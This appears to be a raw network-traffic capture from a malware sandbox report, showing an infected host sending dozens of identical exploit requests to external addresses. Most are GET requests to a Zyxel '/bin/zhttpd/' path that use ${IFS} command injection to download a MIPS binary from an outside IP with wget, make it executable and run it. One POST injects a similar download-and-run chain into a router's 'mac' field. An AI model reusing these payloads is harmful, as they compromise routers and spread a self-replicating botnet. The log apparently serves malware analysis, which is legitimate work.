                                                Jan 28, 2024 10:16:22.768906116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3803192.168.2.2344700108.38.3.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768918037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3804192.168.2.2342830162.68.190.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768944025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3805192.168.2.234093476.208.226.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768974066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3806192.168.2.23592708.104.240.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768991947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3807192.168.2.23542809.180.27.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769028902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3808192.168.2.233869276.112.191.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769047022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3809192.168.2.2355212140.188.185.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769083023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3810192.168.2.235724885.125.107.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769110918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3811192.168.2.2342780147.27.204.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769114971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3812192.168.2.2343782175.73.176.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769140005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3813192.168.2.235505236.104.188.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769165993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3814192.168.2.2359176180.113.215.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769216061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3815192.168.2.234055259.204.56.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769249916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3816192.168.2.2337200216.95.157.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769277096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3817192.168.2.235033453.49.187.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769316912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3818192.168.2.235078442.126.226.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769341946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3819192.168.2.2349902100.15.127.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769359112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3820192.168.2.2350068112.185.40.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769386053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3821192.168.2.2346314190.73.165.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769413948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3822192.168.2.2336124174.166.238.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769452095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3823192.168.2.2354174132.230.215.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769484043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3824192.168.2.2360770126.166.244.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769486904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3825192.168.2.2333684159.12.138.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769516945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3826192.168.2.233325061.51.172.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769560099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3827192.168.2.233910265.180.225.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769588947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3828192.168.2.2347506206.9.123.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769615889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3829192.168.2.233333457.251.137.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769633055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3830192.168.2.2335734108.245.61.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769646883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3831192.168.2.2348150147.65.25.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769705057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3832192.168.2.233920651.115.3.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769738913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3833192.168.2.234662867.222.253.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769753933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3834192.168.2.2355148166.156.125.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769778013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3835192.168.2.2358980203.193.155.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769781113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3836192.168.2.235791423.66.20.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769826889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3837192.168.2.2360442216.232.152.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769855022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3838192.168.2.2352918188.183.57.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769882917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3839192.168.2.2355594120.124.201.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769913912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3840192.168.2.233596482.71.92.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769947052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3841192.168.2.2344618164.188.43.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769963980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3842192.168.2.2349214145.65.236.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.769984961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3843192.168.2.234097276.190.174.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770029068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3844192.168.2.2337824186.110.62.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770065069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3845192.168.2.233536875.75.218.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770103931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3846192.168.2.2334110159.114.221.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770113945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3847192.168.2.2333042103.221.96.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770169020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3848192.168.2.2338718193.7.173.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770184040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3849192.168.2.2357872100.130.19.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770207882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3850192.168.2.2339296222.244.70.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770248890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3851192.168.2.234961699.15.181.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770278931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3852192.168.2.235426278.125.215.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770298958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3853192.168.2.2339676183.8.37.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770318985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3854192.168.2.23485601.7.239.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770365000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3855192.168.2.235149644.205.160.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770387888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3856192.168.2.2340288205.137.160.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.770406961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3857192.168.2.2346018110.80.148.498080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.285026073 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:23.647104025 CET479INHTTP/1.1 400 Bad Request
                                                Server: kngx/1.10.2
                                                Date: Sun, 28 Jan 2024 09:16:23 GMT
                                                Content-Type: text/html
                                                Content-Length: 172
                                                Connection: close
                                                KS-Deny-Reason: client|81.181.57.74|cdnfzct41-cache03.cdnfzct41.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                x-link-via: fzct41:8080;
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>
                                                Jan 28, 2024 10:16:24.887142897 CET479INHTTP/1.1 400 Bad Request
                                                Server: kngx/1.10.2
                                                Date: Sun, 28 Jan 2024 09:16:23 GMT
                                                Content-Type: text/html
                                                Content-Length: 172
                                                Connection: close
                                                KS-Deny-Reason: client|81.181.57.74|cdnfzct41-cache03.cdnfzct41.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                x-link-via: fzct41:8080;
